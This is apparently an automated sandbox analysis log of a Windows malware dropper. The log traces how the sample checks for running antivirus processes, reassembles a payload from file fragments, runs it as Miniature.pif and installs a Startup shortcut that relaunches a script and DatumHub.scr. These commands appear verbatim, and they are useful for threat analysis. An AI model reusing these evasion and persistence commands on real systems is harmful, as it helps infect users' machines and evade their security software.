Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBCD5110_2_00FBCD51
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF8E4410_2_00FF8E44
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC6FE610_2_00FC6FE6
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_01010EB710_2_01010EB7
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB33B710_2_00FB33B7
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FAD45D10_2_00FAD45D
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBF40910_2_00FBF409
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB16B410_2_00FB16B4
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F9F6A010_2_00F9F6A0
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F9166310_2_00F91663
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FAF62810_2_00FAF628
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB78C310_2_00FB78C3
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB1BA810_2_00FB1BA8
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBDBA510_2_00FBDBA5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC9CE510_2_00FC9CE5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FADD2810_2_00FADD28
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FBBFD610_2_00FBBFD6
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB1FC010_2_00FB1FC0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ACB02018_2_00ACB020
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AC94E018_2_00AC94E0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AC9C8018_2_00AC9C80
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE23F518_2_00AE23F5
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B4840018_2_00B48400
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF650218_2_00AF6502
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ACE6F018_2_00ACE6F0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF265E18_2_00AF265E
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE282A18_2_00AE282A
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF89BF18_2_00AF89BF
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B40A3A18_2_00B40A3A
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF6A7418_2_00AF6A74
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AD0BE018_2_00AD0BE0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B1EDB218_2_00B1EDB2
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AECD5118_2_00AECD51
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B40EB718_2_00B40EB7
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B28E4418_2_00B28E44
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF6FE618_2_00AF6FE6
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE33B718_2_00AE33B7
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AEF40918_2_00AEF409
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ADD45D18_2_00ADD45D
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ACF6A018_2_00ACF6A0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE16B418_2_00AE16B4
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ADF62818_2_00ADF628
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AC166318_2_00AC1663
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE78C318_2_00AE78C3
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE1BA818_2_00AE1BA8
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AEDBA518_2_00AEDBA5
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AF9CE518_2_00AF9CE5
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00ADDD2818_2_00ADDD28
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AE1FC018_2_00AE1FC0
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00AEBFD618_2_00AEBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: String function: 00AD1A36 appears 34 times
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: String function: 00AE8B30 appears 42 times
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: String function: 00AE0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: String function: 00FB8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: String function: 00FA1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: String function: 00FB0D17 appears 70 times
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000002.1750126816.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 66fd8d779da5e_EscortsRadios.exe
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1749546590.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 66fd8d779da5e_EscortsRadios.exe
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs 66fd8d779da5e_EscortsRadios.exe
Source: 66fd8d779da5e_EscortsRadios.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal76.expl.evad.winEXE@28/17@3/0
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFA6AD GetLastError,FormatMessageW,10_2_00FFA6AD
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE8DE9 AdjustTokenPrivileges,CloseHandle,10_2_00FE8DE9
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00FE9399
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B18DE9 AdjustTokenPrivileges,CloseHandle,18_2_00B18DE9
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00B19399
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00FF4148
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_00FF443D
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifFile created: C:\Users\user\AppData\Local\DatumHub TechnologiesJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile created: C:\Users\user\AppData\Local\Temp\nsa8F56.tmpJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat
Source: 66fd8d779da5e_EscortsRadios.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile read: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe "C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe"
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 527294
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "phisexyerrorspuzzle" Recorder
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bottle + ..\Audi + ..\Duties + ..\Integral + ..\Warren + ..\Casio + ..\Sunny d
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif Miniature.pif d
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & echo URL="C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr" "C:\Users\user\AppData\Local\DatumHub Technologies\s"
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 527294Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "phisexyerrorspuzzle" Recorder Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bottle + ..\Audi + ..\Duties + ..\Integral + ..\Warren + ..\Casio + ..\Sunny dJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif Miniature.pif dJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & echo URL="C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr" "C:\Users\user\AppData\Local\DatumHub Technologies\s"Jump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 66fd8d779da5e_EscortsRadios.exeStatic file information: File size 1302854 > 1048576
Source: 66fd8d779da5e_EscortsRadios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
